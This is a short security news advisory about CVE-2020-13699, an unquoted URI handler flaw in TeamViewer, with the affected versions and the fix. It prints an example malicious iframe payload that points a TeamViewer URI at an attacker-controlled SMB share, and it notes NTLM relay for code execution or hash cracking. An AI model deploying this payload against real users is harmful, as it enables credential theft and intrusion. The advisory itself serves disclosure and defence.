Recently, TeamViewer officially announced that a vulnerability has recently been fixed, which may allow an attacker to quietly establish a connection with your computer and further exploit the system. The vulnerability number is CVE-2020-13699.
The vulnerability stems from the inability of the program to correctly reference its custom URI handler. Attackers can use this vulnerability to launch TeamViewer with the help of specially crafted parameters.
An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=’teamviewer10: –play attacker-IPsharefake.tvs’>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking). This affects the URI handlers teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, vpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1. This issue was remediated by quoting the parameters passed by the aforementioned URI handlers e.g. URL:teamviewer10 Protocol “C:Program Files (x86)TeamViewerTeamViewer.exe” “%1”
- Teamviewer versions < 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3
In this regard, we recommend that users upgrade Teamviewer in time to avoid hacker attacks.
The post CVE-2020-13699: Teamviewer Unquoted URI handler Vulnerability Alert appeared first on InfoTech News.